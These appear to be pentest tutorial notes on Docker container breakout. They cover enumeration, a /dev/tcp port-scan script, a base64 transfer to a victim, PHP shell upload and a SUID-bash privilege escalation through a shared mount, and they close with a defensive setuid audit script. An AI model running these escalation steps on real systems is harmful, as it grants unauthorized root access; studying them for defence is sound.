Docker Breakout

We can tell that we are inside a Docker container by running the following commands:

hostname

hostname -I --> We notice that we are not on the victim machine because the IP belongs to a different range (172.17.0.0 range)

ifconfig

ifconfig docker0

route -n

mount | grep {directory, example: home}

fdisk -l

df -h

- Enumerate Internal Open Ports

For this we are going to create a basic bash script:

#!/bin/bash

# Restore the cursor and exit cleanly on Ctrl+C
function ctrl_c(){
	echo -e "\n\n[!] Exiting ...\n"
	tput cnorm; exit 1
}
trap ctrl_c INT

# Hide the cursor while scanning
tput civis
# One background connect attempt per port through bash's /dev/tcp pseudo-device;
# a successful redirect means the port accepted the connection
for port in $(seq 1 65535); do
	timeout 1 bash -c "echo '' >/dev/tcp/{Docker Container IP}/$port" 2>/dev/null && echo "[+] Port $port OPEN" &
done; wait
tput cnorm

If we don't have nano or vi on the victim machine, we can copy the script over with the following commands:

  • Attacker

base64 -w 0 port_scan_script.sh | xclip -sel clip

  • Victim

echo {Copy the base64-encoded script, ctrl+shift+c} | base64 -d > port_scan_script.sh

If we don't find new internal open ports, there may be other containers, so a host discovery script should be run (Tunneling/Pivoting/Methodology w/ Chisel/Host Discovery/Linux); then, with the previous script, we can enumerate the open ports of those new containers.

- Web

If the Docker container mounts a directory served by an HTTP server and we have write permissions on it, we can upload a PHP shell, for example, to get access to the real machine.

- Version

If we have permissions to create a Docker container, or we gain access to one, we can check the Docker version and search for exploits:

docker --version

- Evil bash

If we are root inside a Docker container and we also have access to the real machine as a non-privileged user, and a host directory is badly mounted into the container (writable from both sides), we can copy /bin/bash into the mounted directory as the non-privileged user, then go back to the container and add the SUID bit to that bash.

Non-privilege user in real machine:

cp /bin/bash . (inside the mounted directory that is also visible from the container)

Root in container:

chown root:root bash

chmod 4755 bash
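As an added defender-side check (example code, not part of the original notes): the trick above only works if the host honours the setuid bit on the shared directory, so this script lists setuid files under a directory and flags mounts that were not mounted with nosuid. The /proc/mounts-style input format and the directory paths are assumptions.

```shell
#!/bin/bash
# Added defender-side audit (example, not from the original notes).
# The "evil bash" trick needs a host directory that is shared with a container
# AND honoured for setuid on the host. Two checks: list setuid files in a
# directory, and flag shared mounts that were not mounted with "nosuid".

# Print regular files with the setuid bit set under the given directory.
find_suid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Read /proc/mounts-style lines from stdin (device mountpoint fstype options ...).
# For every mount that lacks "nosuid", report any setuid file found beneath it:
# such a file could have been planted from a container sharing that directory.
# Assumption: mountpoints contain no spaces (/proc/mounts escapes them as \040).
audit_mounts() {
    while read -r _dev mountpoint _fstype opts _rest; do
        case ",$opts," in
            *,nosuid,*) continue ;;   # setuid bit is ignored here: not exploitable
        esac
        find_suid_files "$mountpoint" |
            sed "s|^|[!] setuid file on mount $mountpoint (no nosuid): |"
    done
}

# Stand-alone usage: ./audit_suid_mounts.sh <shared directory> [more ...]
# Audits every current mount, then the directories given on the command line
# (bind-mount sources that are plain directories inherit the options of their
# parent mount and therefore do not show up as their own line in /proc/mounts).
if [ $# -gt 0 ]; then
    [ -r /proc/mounts ] && audit_mounts < /proc/mounts
    for dir in "$@"; do
        find_suid_files "$dir" | sed "s|^|[!] setuid file in shared directory: |"
    done
fi
```

Remounting the shared directory with nosuid (or mounting volumes read-only where possible) removes the privilege gain even if a setuid file is written there.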
